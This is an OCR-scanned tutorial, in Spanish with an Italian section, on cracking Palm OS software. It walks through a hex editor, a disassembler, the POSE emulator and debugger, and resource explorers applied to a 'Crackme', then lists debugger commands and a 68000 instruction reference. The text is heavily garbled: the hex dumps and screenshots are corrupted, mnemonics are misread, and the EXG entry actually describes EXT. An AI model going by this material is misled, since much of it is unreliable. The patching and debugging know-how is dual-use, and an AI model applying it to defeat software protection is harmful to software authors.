00000060h: F? E6 63 É6F 64 65 00 01 00 01 48 OE 64 61 74 61 ; _—pcode....H.data 
00000070h: 00 DO 00 01 96 5A 78 6C 6F 63 00 01 00 01 B2 03 ; ....Ózxloc... 31 
000000S80h: 74 53 54 4c 00 01 00 01 CO 05 54 62 6D 70 07 D6 ; t38TL.... L. Tbmp.Í 


00000090h: 00 01 C6 A2 54 62 6D 70 07 D5 00 01 CD 26 54 62 ; ..¿óTbmp.1..=£Tb 
D00000a0h: 6D 70 07 DO 00 01 D3 AA 54 62 6b 70 07 D? 00 01 ; mp.5..E-Tbmp.H.. 
DOOODOLk0h: D9 5A 74 46 52 4D 08 SE 00 01 DE AA 74 46 52 4D ; JzZtFRM.A..I-tFRM 
000000<0h: 08 4c 00 01 E3 8C 74 46 52 4D 09 3D 00 01 ES 04 ; .L..O1tFRM.=..B. 
000000d0h: 74 46 52 4D 09 5C€ 00 01 EC 74 74 46 52 4D 08 6B ; tEFRM.:..yttFRM.k 
000000e0h: 00 01 FO CO 63 6c 75 74 00 08 00 01 F4 FO 54 62 ; ..-Lleolut....I-Tb 
D00000f0h: 6D 70 07 DE 00 01 FS F2 54 62 6D 70 07 E0 00 01 ; mp.1..*_Thbmp.Ó.. 


Si necesita ayuda, pulse Fl Pos: adH, 173, CO DOS Mod.: 2220305 06:41:50p.m. Tamaño: 155609 INS Na 


Desde este podremos realizar los parches directamente reemplazando por intrucciones en hexadecimal. 


-< £ $ 5 ba: 00480 


5.- PalmDemon v0.27 


Con este podremos desensamblar archivos PRC y nos muestra el juego de instrucciones. Este es mejor Que el PilotDis (No funciona en 
Windows XP) ya que trabaja este último en MS-Dos 6.0. 


É£. palmdemMON y0.27 (09/09/2002) [C-AMy DownloadsiCrackmel Hb++. pre] 
File Tools Help 


E (3 Code 
[8] Code (SEG: 0x03) 
[8] Code (SEG: 0x02] 
[8] Code (SEG: 0x01] 
[8] Codel (Environment) 


00014F34 B0 6E FF F4 Ch sl 
00014F38 67 DC 
00014F34 3F 3C 00 05 


3D Formula 


A Powered by HB++ 
Evaluation Yersion Cl 


For non | use 
only. 


Code (Segment 03) 


Code (Segment 02) 00014F3E 4E 4F 41 92 y 
SON 00014F42 68 00 90 36 e 2003. Peter Holmes 
loc_14F46: 
00014F46 20 47 [ox]O 
Dec: [018005223000 00014F48 4E 90 
[ETE 00014F44 BO AE FF FS 0 LAN UU, LU 
Hex [431318658 00014F4E 65 10 BCS.S LOC_14F60 
Bin: (10000110001001100011110011001 00014F50 22 47 MOVE. .L D7, A1 
Asc: PA 00014F52 4E 91 JSR.L (41) 
00014F54 06 30 FF F6 C5.. A4DD,L  -$00093480, DO 
D0014FS4 BO AE FF FS CMP.L LYA4R_08, DO 
D0014FSE 63 0C BLS.S LOc_14F6C 
loc_14F60: 
00014F60 3F 30 00 05 MOVE.$w F$0005, -(47) 
00014F64 20 6E FF EC MOVE.L LVA4R_14, 40 
3D Formula 13] D0014F63 4E 90 JSR.L (40) 
D0014F64 54 SF A4DD.L $$2, A7 
loc_14F6C: 
D0014F6C 3F 2E 00 0€C MOVE.w $C(46), -(47) 
00014F70 2F 14 MOYE.L (44), -(47) 


6.- Emulador Pose 3.5 


Un Emulador que útiliza un clon de la Palm y donde podremos úyilizar las aplicaciones. Descargarnos también el Debugger que viene con 
este. 


6F GE 5F 43 6F 64 65 00 114 54 63 ; tration Code..Tc 


vo | Ao 710710088 
49 INVALID.NY -Hp.S5 
DO £n..X. .9. .«NOÍs 
FA (HE. -¿.Hn >/<sn 
4F ul : UumBONOúBS. -*?... 
DE : /.Hz..Hz...ú xl 
FC Contact: Ed Witkowski NuJ« 20"..glw.*X 
30 edwitkowskighotmail.com n 7.0.00.m. n ? 
o0 Retail ¿ .0.20.00 n >.0.4 
6E Reg-Key For registered ; DO.m. n >.0.20.0. 
30 48 Allyyour data is waiting for you. : n ”.0.a0.m. n ? 
00 drid dde .0.z0.n. n >.0. 
DA Reference 4: BAPKBFDB ; D.* .v.RCáDd.Án.. 
08 RegrKeyc lo ¿o 1..C.. LN, .*Nu 
53 ; ÉGet_SerialNumbe 
56 r...NV..Hp.S£gn.. 
14 ¿Gr «did 0.0420 
4F Hx.)NOá. (H/ .NOá! 
4F $Hv.PO' .B2D.RC.C 
A? .)mIB”B*/.B*B*B? 
2E : NOÓB?.../.Hz..Hz 
FF .h _pNud.O”.. 
Do G>VY.X. ..2. D.9. 


DO 52 FA ; .BO.0.RDRCI20.g. 


7.- Debugger Palm Pose 3.5 


Debugger Pose incluido con el emulador. 


Palm Debugger MEE 


File Edit Connection Source Window Help 


Debugger AE 
att > a 
EXCEPTION ID = $80 

101838242 —*ANDI."W *RÍAGOO, SR da | 027€ A600 


atb "Frmalert" 
A-trap set on 0192 (Frmalert) 
5 


10138246  *RTS | 4E75 
5 


'tcjsmwait' 
+$0032 10187EFO *MOWE.L DO,D3 | 2600 
+$0034 10187EF2 *ADDQ.B *$01,$0005(43) | 522B 0005 
+$0038 10187EF6 *MOVWE.L D4,A0 | 2044 
+$0034 10187EF8 *SUBQ.L R$01,$0024(A0) | 53A8 0024 
'tcjsmwadt' Wwi11 Not Branch 
+$003E 10187EFC *BLT.S cjsmwait+$0068 5 10187F26 | 6028 
+$0040 10187EFE *MOWE.L D3,-(A7) | 2F03 
+$0042 —10187F00 *JSR *+$03B2 5 101882B2 | 4EBA 0360 
1018382B2  *MOVE.W $0006(A7),DO | 302F 0006 
1018382B6  *BCLR *$000F,DO | 0880 D0DF 
1018382BA *TST.B $00000111 5 00000111 | 4438 0111 
Wwi11 Branch 
1018382BE *BEQ.S *+$0006 5 10188204 | 6704 
10188204 —*MOVE DO,SR | 46c0 CPU Registers MEE 


Error: not attached to remote. DO: 00002004 


D1: 00002000 
D2: 00000000 
D3: 00002004 
D4: ODO3F1FO 
DS: 00000000 
D6: 00002704 
D7: 0003D07E 


3 


EMM ==> y Al 
VS $ "ej 


Address Calc Cord Info 


S 6 


Clock DateBook  HotSync 


o 90 0wuy 


Mail MemoPad Note Pad 


E 


Prefs Security  ToDoList 


AO: ODO3F1FO 
Al: 00005448 
A2i DOO3F1FO 
A: DOO3E67C 
A4: DOO3D1OC 
AS: 00004E08 
A6: DOO3B9DC 
A7: 0003B998 


(Local wars not available...) 


SR: tTSxnZwvc 6 
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Elemento no recopilado: elimine elementos 
para aumentar el espacio disponible 


$.- PRCexplorer 


Herramienta que muestra Las Talt (Alertas), Formulario, Etc 


Palm Application Explorer - Crackmel Hb++ A ES 
File Edit View Help 


[SO ¿26/6/24 1J[L 
- Crackmel Hb++. 
peli Resource size: 122 bytes Fl offset: Ox25DCF (155087) in | Qu] 


3 MBAR (1) 
2032 (0x07f0) 
> Talt úl 3D Formula 
5 [OX0005 Dal 
pe PA pi non commercial use 
2001 (0x07d1] mee 
2002 (0x07d2) o Holmes 
2003 (0x07d3) 
2004 (0x07d4) 
2005 (0x07d5) 
2006 (0x07d6) 
2007 (0x07d7) 
2008 (0x07d8) 
2009 (0x07d9) 
2010 (0x07da) 82 81 danoócan 
2011 (0x07db) 0008: 33 44 20 46 6F 72 6D 75 3D Formu 
2012 (0x07dc] 00108: 6€C 61 58 6F 77 65 72 la.Power 
2013 (0Ox07dd) 0018: 65 64 20 62 79 28 48 42 ed by HB p 
2014 (0x07de] yy - 
Alert (Regis Nicolas <Regis.NicolasG4PalmSource.com>]) NUM. Y 


9.- SouthDebugger 


Depurador de aplicaciones Palm, es shareware pero es mejor que todos los anteriores, requiere tener instalada una Runtime Java, si tienes 
Windows ve a la página de www.microsoft.com Ya que la versión de www.sun.com alentiza el sistema, Microsoft ha creado su propia versión 


de Java que no consume recursos de sistema, será esta una de tantas estrategias comerciales de Don Bill Gates, Bill Ventanas. 


vi log opcodes [v| log routine Ta vi log register E 


Y bnly log oncodes with this prefe | TE 


Sp: 00000000 pc: 10C61722 SR: DO000A000 
10C61722 2448 MOVEA.L A0, AZ 


TERED 


Ls 
tte 
AE E 


ES e ¡ p AAA 7 TA 
EEE A Ea NO Ñ a de SRA ASA, 1% : e a: 


A 
0 O 


systrapFrmp 222222] 
sysTrapFrnSetTitle al 
sysTrapFrmilert 
sysTrapFrmDoDialog 

1[A4194] sysTrapFrmCustomilert 
[14195] sysTrapFrmHelp 

l[1a196] sysTrapFrmUpdateScrollers 

ll1a197] sysTrapFrnGetFirstForm 
sysTrapFrnVisible 
sysTrapFrnGet0bjectBounds 
sysTrapFrunCopyTitle 

sysTrapFrmGotoForm 

[[A19C] sysTrapFrmPopupForm 

[A19D] sysTrapFrmUpdateForm 
[A19E] sysTrapFrmReturnToForm 
[A19F] sysTrapFrmSetEventHandler 

¡(([A140] sysTrapFroDispatchEvent 

[(ta121] sysTrapFrmCloseAllForms 


La +3) 
ES 


a 
E 

set | 
| 


Otras herramientas se discutirán en los próximos tutoriales que publique.. 
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INTRODUCCION 


Lista de comandos Palm Debugger (Debugger Incluido con el Emulator 
Pose 3.5) 


AL ATAQUE 


Una vez cargado el debugger para palm incluido en el emulador pose y usar el comando : 
7 (Enter) Nos muestra el siguiente listado 


Flow Control Commands 

att ;Attach to Remote 

g [<addr>] ¡Go 

gt <addr> ¡Go Till 

s ¡Step Into 

t ;Step Over 

br <addr> ¡Set Breakpoint 

el [<addr>] -or- bre [<addr>] ¡Clear Breakpoint(s) 
brd ¡Display Breakpoints 

atb [<"funcName"> | <A-trap +t>] ¡Set A-Trap break 
atc [<"funcName"> | <A-trap +t>] ¡Clear A-Trap break 
atd ¡Display A-Trap breakpoints 

dx ¡Turn DbgBreaks on/off 

reset ;Reset the Pilot 


Memory Commands 

1l [<addr> [<lineCount>]] ¡Instruction List 

dm <addr> [<count>] [<template>] ¡Display Memory 

db <addr> <value> ¡Display Byte 

dw <addr> <value> ¡Display Word 

dl <addr> <value> ¡Display Long 

sb <addr> <value> ;Set Byte 

sw <addr> <value> ¡Set Word 

sl <addr> <value> ;Set Long 

fill <addr> <nbytes> <value> ;Fill Memory 

fb <value> <addr> <nbytes> <Mlags> ¡Find Byte 

fw <value> <addr> <nbytes> <Wlags> ¡Find Word 

fl <value> <addr> <nbytes> <Wlags> ¡Find Long 

ft <text> <addr> <nbytes> <Mlags> ¡Find Text 

scó [<addr> [<frames>]] ¡Stack Crawl A6 

sc ;Alias for scó 

sc7 [<addr> [<frames>]] ¡Stack Crawl A7 

wh [<"funcName"> | <A-trap +t> | <address>] ¡Where is routine 
atr <"funcName"> <A-trap +> ¡Register routine name with an A-trap number 


Template Commands 

typedef <template> [C...]<"name"> [<[elts]>] ;Indirect template definition 
typedef struct <"name"> ¡Begin structure definition block 

> <template> [O...]<"name"> [<[elts]>] [N-] ¡Field definition 

typeend ;End structure definition block 

sizeof <template> ¡Display template size 


Register Commands 
reg ¿Display all Registers 


Utility Commands 

load <"filename"> <addr> ¡Load File Data Fork from Host into RAM 

save <"filename"> <addr> ¡save RAM to file on Host 

bootstrap <"filename"> <addr> ¡Load $ execute image using EZ bootstrap mode 
flash <"filename"> <addr> ¡Load File Data Fork from Host into FLASH memory 
run <"filename"> ;¡Execute a Pilot Debugger script 

alias <"name"> [<"text">] ;¡Define/list an alias 

var <"name"> [<initializer>] ¡Define a variable 

aliases ¡List all alias names 

templates ;List all template names 

variables ¡List all variable names 

keywords ;List all keywords 

sym [options...] ;source level debugging info/control 


Console Commands 

CardInfo <cardNo> ;Display memory card information 
StoreInfo <cardNo> ¡Display memory store information 
HL <cardNo> ;Heap List 

HD <heapID> [Nc] ¡Heap Dump 

HT <heapID> [Nc] ¡Heap Total 

HChk <heapID> [Nc] ¡Heap Check 

Info <chunkPtr> ¡Display chunk information 

Info <localID> Ward <cardNo> ¡Display chunk information 
Dir <cardNo> [<options>] ¡Display database directory 


Opened ;List open databases 


Miscellaneous Debugger Commands 

help ¡Display a summary of debugger commands 

(help <cmd>) | (<cmd> ?) ¡Display debugger command help 
7 ;Abbreviation for the help command 

penv ¡Display debugger Environment Information 


Debugger Environment Variables: 

DebOut ¡debugger-debug style output enabeld(true/false) 
SymbolsOn ;disassembly symbol printing enabled(true/false) 
StepRegs ¡show registers after every step 

ReadMemHack ;read memory hack enabled(true/false) 


Predefined Constants: 

true ¡integer value 1 

false ¡integer value O 

srTmask ;status reg Trace bit 
srSmask ¡status reg Supervisor bit 
srImask ¡status reg Interrupt field mask 
srXmask ;status reg eXtend bit 
srINmask ;status reg Negative bit 
srZmask ;status reg Zero bit 
srVmask ;status reg oVerflow bit 
srCmask ¡status reg Carry bit 


//Hasta la proxima ,este es mi primer tutorial y ya estoy escribiendo otro, gracias a palm spanish tutor por estar 
interados en este tipo de ingenieria que no es más que aprender a proteger mejor el software y encontrar posibles bugs. 
(en algún lugar de Europa) 
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SouthDebugger, PRCedit, PilotDis. POSE Palm emulator, 


INTRODUCCION 


AL ATAQUE 


ISTRUZIONI 68000 


Queste sono le istruzioni Motorola trovate a giro su internet 
(in inglese..tanto lo conoscete, vero???) 


ABCD - Add Binary Coded Decimal 

This instruction is a specialized arithmetic instruction that adds together two bytes (and only bytes) containing binary- 
coded decimal numbers. The addition can either be done between two data registers or between two memory locations. 
If performed on bytes in memory, only address register indirect with predecrement addressing can be used. This 
facilitates easy manipulation of multiple-precision BCD numbers. The extend bit is added along with the BCD bytes to 
allow this multiprecision data manipulation. Also note that the Zero flag is only changed if the result becomes non-zero. 
Therefore, both the Extend and Zero bits in the condition code register should be preset before the operation is 
performed. The Extend bit would normally be preset to a zero (to prevent extension on the first addition), and the Zero 
bit to a one (to preset a zero result prior to the first addition). A MOVE ++4,CCR would setup these flags correctly. 
Syntax: ABCD Dn, Dn or ABCD -(An), -(An). Flags affected: The Extend, Zero, and Carry flags are affected as per the 
result of the operation. The state of the Negative and Ovreflow flags is undefined. 

ADD - Add Binary 

The ADD instruction adds the source to the destination operand with the result appearing in the destination. It is 


possible to add bytes, words, or long words with this opcode. Either the source or destination (or both) must be a data 
register. The source operand can be any memory location or data register, and the destination operand can also be any 
memory location or data register. Syntax: ADD Dn, Dn or ADD address, Dn or ADD Dn, address. Flags affected: The 
Extend, Negative, Zero, Overflow, and Carry flags are all affected as per the result of the addition. 

ADDA - Add Address 

This variant of the ADD instruction only differs from ADD in that an address register is specified as the destination. As 
an address rather than data is being manipulated, the condition code flags are left unaltered. Only sign-extended words 
or long words can be added. 

ADDI - Add Immediate 

This variant of the ADD instruction is used to add a constant value to the destination. The immediate operand can be 
any 8-, 16-, or 32-bit value as specified by the .B, .W, or .L opcode suffix. The destination can not be an address 
register or a program counter relative address. Syntax: ADDI +imm, Dn or ADDI +imm, address where address is any 
memory addressing mode except program counter relative. Flags affected: The Extend, Negative, Zero, Overflow, and 
Carry flags are all set as per the result of the addition. 

ADDO - Add Quick 

This variant of the ADD instruction is used to add a small positive integer between one and eight to the destination. The 
destination can be a memory location, a data register, or an address register. If 1t is an address register, the condition 
code flags are unaffected and the operand length can not be a byte. This operation takes the place of the increment 
instruction found on other processors. Syntax: ADDQ +timm, Rn or ADDQ +fimm, address. Flags affected: The Extend, 
Negative, Zero, Overflow, and Carry flags are all set as per the result of the addition unless the destination is an address 
register. 

ADDX - Add Extended 

This variant of the ADD instruction adds two numbers plus the Extend bit from the condition code register. This allows 
multiple-precision additions to be performed. For this reason, the Zero flag is only affected when a non-zero result is 
obtained. This means that if multiple numbers are added together using ADDX, the Zero flag will stay reset 1f any of 
those numbers were non-zero. Syntax: ADDX Dn, Dn or ADDX -(An), -(An). 

AND - Logical AND 

This instruction logically ANDs bits in the source operand with the same number of bits in the destination operand were 
the result is left. The number of bits can be 8, 16, or 32 as per the .B, .W, or .L opcode suffix. One or both operands 
must be a data register. Syntax: AND Dn, Dn or AND Dn, memory or AND memory, Dn. 

ANDI - Logical AND Immediate 

This instruction logically ANDs an immediate byte, word, or long word value with the destination. The destination can 
be a data register, memory, or one of two special cases: the condition code register, only a byte-length immediate value 
1s allowed. If the destination is the status register, only a word-length immediate value is allowed, and the processor 
must be in supervisor mode or a priviledge voilation will occur. Syntax: ANDI +timm, Dn or ANDI +ftimm, memory or 
ANDLB +timm 8-bit value, CCR or ANDI.W +timm 16-bit value, SR (Privileged). Flags affected: The Overflow and 
Carry bits are reset, the Negative and Zero bits set as per the result, and the Extend bit is unaffected. 

ASL - Arithmetic Shift Left 

This instruction shifts the destination operand left by a specified number of bits. If you are shifting a data register, the 
number of bits to be shifted can be specified as an immediate value or as a value in another data register. The immediate 
value can be 1 to 8, whereas the data register can be 1 to 64 (where zero acts as the 64 count). Data registers may be 
shifted as 8, 16, or 32 bit quantities. Only 16-bit word values can be shifted in memory and then only by one bit. As 
shown below zeroes are shifted in at the right hand side of the operand. As each bit is shifted out of the left of an 
operand, it is placed in the Carry and Extend bits of the condition code register. If the sign of the operand changes 
during the shift, the Owerflow bit is set in the condition code register. C < < | <<< ASL <<< | < 0 X < Syntax: ASL Dn, 
Dn or ASL +timm 3-bit value, Dn or ASL memory (1 bit shift only). 

ASR - Arithmetic Shift Right 

This instruction shifts the destination operand right by a specified number of bits. If you are shifting a data register, the 
number of bits to be shifted can be specified as an immediate value or as a value in another data register. The immediate 
value can specify a shift of 1 to 8, while the data register can specify a shift of 1 to 64 (where zero acts as the 64 count). 
Data registers may be shifted as 8, 16, or 32 bit quantities. Only 16-bit word values can be shifted in memory and then 
only by one bit. Each bit shifted out of the right hand side of an operand is placed in the Carry and Extend bits of the 
condition code register. As shown below the bit shifted in at the left hand side is the current sign bit (the most 


significant bit is therefore preserved throughout the shift). > C Current MSB > | >>> ASR >>> | > > X Syntax: ASR Dn, 
Dn or ASR +ftimm 3-bit value, Dn or ASR memory (1 bit shift only). 

BRA - Branch Always 

This instruction changes the program counter register so execution continues at a different point in the program code. 
The destination of the jump is specified as a signed displacement to the program counter. This signed displacement can 
be an 8- or 16- bit quantity. With a bit 8-bit quantities, this allows branches of +126 to -128 bytes; 16-bit quantities can 
specify branches of +32766 to -32768 bytes. The value of the program counter when the displacement is added is taken 
to be the first word after the BRA opcode. This is the actual opcode address plus two. Normally an assembler will 
assume a 16-bit quantity as the displacement, but if an opcode suffix of .S is appended th the BRA, a short 8-bit 
displacement will be used instead. Syntax: BRA label (16-bit displacement) or BRALS label (S-bit displacement). Flags 
affected: None. 

Bcc - Branch Conditionally 

Other variants of the BRA instruction allow a branch to be made only if a certain condition is met in the condition code 
register. These Bcc instructions can be divided into three different categories. Whether or not this instruction is actually 
executed depends on the required condition, which is verified by means of the flags. A minus sign before a flag 
indicates that it must be cleared to satisfy the condition. Logical operations are indicated with "*" for AND and "/" for 
OR. Branches depending on flag status: 

BCC - Branch if carry clear -C 

BCS - Branch if carry set C 

BNE - Branch if zero clear -Z 

BEO - Branch if zero set Z 

BVC - Branch if overflow clear -V 

BVS - Branch if overflow set V 

BPL - Branch if negative clear -N 

BMI - Branch if negative set N Branches after unsigned comparison: 

BHI - Branch if higher than -C * -Z 

BHS - Branch if higher than or same as 

BLO - Branch if lower than 

BLS - Branch if lower than or same as C/Z 

BEOQ - Branch if equal to Z 

BNE - Branch if not equal to -Z Branches after signed comparison: 

BGT - Branch if greater than N * V*-Z/-N*-V *-Z 

BGE - Branch if greater than or equal to N * V/-N * -V 

BLT - Branch if less than N * -V/-N * Y 

BLE - Branch if less than or equal to Z/N * -V /-N * Y 

BEOQ - Branch if equal to Z 

BNE - Branch if not equal to -Z Syntax: Bcc label (16-bit displacement) or Bcc.S label (8-bit displacement). Flags 
affected: None. 

BSR - Branch to Subroutine 

This instruction causes control to be passed unconditionally to the specified program counter displacement as in the 
BRA opcode. However, before the branch is made, the address of the opcode following the BSR is saved on the stack 
so return can later be made to that address to continue processing at that point. This is achived as follows: 1. The 24-bit 
address following the opcode is pushed on the stack as two words. 2. The program counter is loaded with its new value 
and processing continues at the new address. Syntax: BSR label (16-bit displacement) or BSR.S label (8-bit 
displacement). Flags affected: None. 

BCHG, BCLR, BSET, BTST - Bit Test and Change, Clear, Set 

These instructions allow the manipulation and testing of single bits. The bits are numbered from the right to the left 
starting with bit no zero. Thus a byte contains bits O to 7; a word bits O to 15; and a long word bits O to 31. The number 
of the bit to be tested is specified in a data register or as an immediate value. The value of the bit is reflected in the Zero 
flag of the condition code register. This means that the if the bit tested was zero, the Zero flag will be set (Z=1). 
Therefore the Zero flag is always the opposite of the bit being tested. Once the test is made and the Zero flag is set up, 
the tested bit is manipulated as follows: 

BCHG - The bit is reversed. 


BCLR - The bit is cleared to zero. 

BSET - The bit is set to a one. 

BTST - The bit is unchanged. Syntax: Bxxx Dn, address or Bxxx +timm, address. Flags affected: Zero flag only. 

CHK - Check Against Bounds 

This instruction checks its first operand against a data register's word contents. If the data register contains less than 
zero or greater than its first operand, a trap to the address specified by vector 6 occurs. Thus, CHK can be used to 
ensure that an element of an array is neither below nor above its boundaries. Syntax: CHK bounds, Dn where bounds is 
anything except an address register. Flags affected: All flags are undefined after this operation. 

CLR - Clear Destination to Zero 

This instruction allows a byte, a word or a long word to be cleared to a zero according to the operand suffix .B, .W, or. 
L. The destination can be either a data register or memory. Address registers cannot be cleared with the CER instruction 
(Use MOVE.L +0, An). Syntax: CLR Dn or CLR address. Flags affected: Negative, Overflow, and Carry are all set to 
zero, the Zero flag is set to a one, and the Extend flag is unaffected. 

CMP - Compare 

This instruction compares two operands and sets flags in the condition code register according to the result. Except for 
the Extend flag, the flags are set as 1f the source operand were subtracted from the destination. However, the result of 
this subtraction is not actually retained so the destination remains unchanged. The information about the comparison 
that is stored in the condition flags can then be acted upon by a Bce-instruction. CMP may be used with byte, word, or 
long word source operands. Note that although any addressing mode can be used to specify the source operand, an 
address register can only be used if a word or long word comparison is performed. Syntax: CMP address, Dn. 

CMPA - Compare Address 

This variation of the CMP instruction is used to compare a source operand with an address register as destination 
operand. Only word or long word compares are allowed with CMPA. If a word is used as source, if is sign-extended to 
32 bits before the comparison is made. Syntax: CMPA address, An. Flags affected: Same as CMP instruction. 

CMPI - Compare Immediate 

This variation of the CMP instruction is used to compare a source operand consisting of an immediate value with either 
a data register or memory. The comparison length can be byte, word, or long word as specified by the .B, .W, or .L 
opcode suffix. Syntax: CMPI +timm, Dn or CMPI +imm, memory. CMPM - Compare Memory 

This variation of the CMP opcode is used to compare sequential memory locations. These locations can be of type byte, 
word, or long word as specified by the .B, .W, or .L opcode suffix. To perform the sequencing automatically through 
memory, both source and destination operands must be specified using address register indirect with postincrement. 
Thus, after the compare is made, the address registers of both source and destination operands will be incremented by 
the length of data compared. Syntax: CMPM (An)+, (An)+. Flags affected: Same as the CMP opcode. 

DBRA - Decrement and Branch 

This instruction is used to control the program counter register in much the same way as BRA instruction is except that 
this allows greater power and versatility. By using DBRA, a specified data register is decremented and the branch made 
only if that register goes past zero. Thus, the count from a positive number will count down until zero and branch one 
more time. This allows loops where an index of zero is the last element. Note that as a result of this, the value left in the 
register will be -1 when an exit is made at the end of the loop. As an example, if eight locations were to be accessed, the 
data register specified in the DBRA instruction would be loaded with seven. The countdown, including the final zero, 
would go through eight cycles. The program counter register is modified as in the BRA instruction whereby a sign- 
extended 16-bit displacement is added to the program counter. No short 8 bit form is available. only bits O to 15 (that is, 
one word) of the data register is used. The destination of the branch is usually supplied as a label from which the 
assembler automatically calculates the displacement needed to that label. Syntax: DBRA Dn, label. 

DBcc - Decrement and Branch Conditionally 

This is a whole series of instruction that resemble the conditional versions of the BRA opcode. Conditional decrement 
and branch instruction work in a similar manner to the DBRA instruction except that one step is added to the execution 
process. Before the decrement is performed as in DBRA, the condition specified in the mnemonic is tested (in the 
opposite order to that suggested by the opcode name). If the condition is true, control drops through to the next 
instruction - the branch is not made. This is the opposite to the normal branch instruction where the conditional branch 
1s made if the condition is true. Thus this mnemonic might more accurately be read as "decrement and branch if the 
condition is not fulfilled”. Powerful loops can be constructed using the decrement and branch conditional instruction; an 
exit can be made from the loop either if the data register passes zero or if a pretested condition is met. The following list 


displays the conditions available for testing before the decrement and possible branch is made. This list is similar to that 
for the Bcc opcode with the addition of the F (false) and T (true) conditions, which specify an always false or always 
true precondition. Therefore a DBF is always false, so it will never drop through to the following opcode. Thus, the 
branch after the decrement will always be performed. Conversely, a DBT is always true, so it will always drop through 
and never perform the decrement. (This would only be likely to be of use during program development.) 

DBEO - Decrement, branch equal. 

DBF - Decrement, branch false. (Same as DBRA.) 

DBGE - Decrement, branch greater than or equal. 

DBGT - Decrement, branch graeter than. 

DBHI - Decrement, branch higher. 

DBLE - Decrement, branch less than or equal. 

DBLS - Decrement, branch lower than or same. 

DBLT - Decrement, branch less than. 

DBMI - Decrement, branch minus. 

DBNE - Decrement, branch not equal. 

DBPL - Decrement, branch plus. 

DBRA - Decrement, branch unconditionally. 

DBT - Decrement, branch true. (Branch never taken.) Syntax: DBcc Dn, label. 

DIVS, DIVU - Divide Signed, Unsigned 

These instructions allow a 16-bit divisor (n,,mnare) to be used as a source and a 32-bit destination to be specified as 
dividend (t,,ljare) in a divide operation. DIVS assumes both mubers are signed, whereas DIVU assumes both to be 
unsigned. The destination must be a data register. The source can be a memory location or another data register. The 
result is stored in the low word of the destination data register and the remainder in the high word of the same register. 
Tf the result will not fit in the 16 bits of the low half, the Overflow flag is set in the condition code register. It is possible 
that the overflow condition can occur during the internal processing of the divide, in which case the Negative and Zero 
flags will be undefined as will be the result. Either a conditional branch on overflow or a TRAPV can be placed after 
the divide opcode to act upon the error. Another problem occurs if a divisor of zero is specified. In this case a division- 
by-zero exception processing sequence is automatically initiated which causes a trap through vector 5. Syntax: DIVx 
Dn, Dn or DIVx address, Dn. Flags affected: The Carry flag is always set to zero. The Zero, Overflow, and Negative 
flags are set as per the result. The Extend flag is unaffected. 

EOR - Logical Exclusive OR 

This instruction performs a logical exclusive OR of the source operand with the same number of bits in the destination 
operand where the result is left. The number if bits can be 8, 16, or 32 as specified by the .B, .W, or .L opcode suffix. 
Syntax: EOR Dn, Dn or EOR Dn, address or EOR address, Dn. Flags affected: The Overflow and Carry flags are reset. 
The Negative and Zero flags are set as per the result, and the Extend flag is unaffected. 

EORI - Logical Exclusive OR Immediate 

This instruction performs a logical exclusive OR on a length of byte, word or long word between an immediate value 
and a destination. The destination can be a data register, memory or one of two special cases: the condition code register 
or the status register. If the destination is the the condition code register, only a byte-length immediate value is allowed. 
If the destination is the status register, only a word-length immediate value is allowed, and the processor must be in 
supervisor mode or else a priviledge voilation will occur causing a trap through vector 8. Syntax: EORI Himm, Dn or 
EORI +timm, memory or EORLB +timm 8-bit value, CCR or EORI.W +imm 16-bit value, SR (Privileged). Flags 
affected: Same as the EOR instruction. 

EXG - Exchange registers 

This instruction allows the sign bit (the most significant bit) to be extended up to the next higher size. Thus if an opcode 
modifier of .W is used, the bit in position 7 of the lower-order byte will be extended into the rest of the word (in bits 8 
to 15). If an opcode modifier of .L is used, the bit in position 15 of the low-order word will be extended into the rest of 
the long word (bits 16 to 31). If a byte value has to sign-extended to a long word, both an EXT.W and an EXT.L have 
to be performed on the data register. Syntax: EXT Dn. Flags affected: The Negative and Zero flags are set as per the 
result. The Overflow and Carry are reset to zero, and the Extend flag is unaffected. 

JMP - Jump 

This instruction allows execution of the program to be transferred anywhere within the entire addressing space of the 
68000. The jump address can be specified using any memory mode except register indirect with postincrement or 


predecrement. It should be borne in mind that an absolute address specified in a jump instruction will load the program 
counter immediately with that value. Because absolute addresses are not position- independent. If the program is moved 
in memory it has to be reassembled if the label is contained within the program. The JMP instruction with an absolute 
address is more properly used for jumps to static locations such as ROM routines. To keep the jump position- 
independent, a program-counter-relative address should be specified. Syntax: JMP address where address is any 
addressing mode except (An)+ and -(An). Flags affected: None. 

JSR - Jump to Subroutine 

This instruction allows control to be redirected in a similar manner to the JMP instruction; however, before the jump is 
made, the address of the following opcode is pushed onto the stack. (See BSR for a description of the stack save 
process.) Thus a subroutine can perform a task, and when it finishes, it can execute a Return instruction to return to the 
address saved on the stack. As far as the destination address of the JSR instruction is concerned, the same caveats apply 
as for the JMP instruction. Absolute addresses, even as labels inside your program, should be avoided where possible to 
avoid a program which is not position-independent. Unless using such things as ROM routines or memory-mapped 
hardware locations, which have absolute addresses, use program counter relative or address register indirect addressing. 
Syntax: JSR address where address is any addressing mode except (An)+ and -(An). Flags affected: None. 

LEA - Load Effective Address 

This instruction provides a simple way of loading any address register with the address resulting from nearly any 
addressing mode. Only two such modes are excluded from the list of possibilities. Due to the fact that address register 
indirect with postincrement or predecrement represent a dynamically increasing or decreasing addresses, these two 
modes cannot be used with LEA. But any other address, no matter how complicated, (including address register indirect 
with displacement and index) can be loaded into the specified address register. This saves performing the address 
arithmetic within the program. The processor will automatically take the same value as the calculated address - or in 
other words "the effective address". Only address registers can be used with this instruction, and the destination address 
register is loaded with a 32-bit long value even though the address will only be 24 bits long. Syntax: LEA address, An 
where address is any addressing mode except postincrement and predecrement. Flags affected: None. 

LINK - Link Subroutine 

This instruction is a specialized data area allocation opcode for use by subroutines that require a temporary work area 
that will be relinguished after use. Normally, when a subroutine has been entered from a JSR or BSR instruction, the 
return address (that is, the address of the instruction after the JSR or BSR) has automatically been saved on the stack by 
the processor before transferring control to the subroutine. This is part of the regular linkage for a subroutine call, which 
1s automatically performed by any computer processor. The LINK instruction adds another automatic-linkage option 
after control has been handed to the subroutine. Assume the subroutine nedds ten bytes of temporary storage in order to 
perform its function. The ideal place for this would be on the stack, which is the usual place for dynamic registers saves 
during a program's operation. As the stack pointer saves numbers in a downward direction in memory, simply 
subtracting ten from the stack pointer register A7 would reserve ten bytes of the stack space with A7 pointing at it. 
However, A7 may not point to the ten bytes for long, as other items may subsequently be pushed onto the stack 
changing A7 to point lower in memory. So ideally, another address register should be loaded with the contents of A7 
before it was decremented by ten so we have a firm pointer to the stack before it is changed. This is exactly what the 
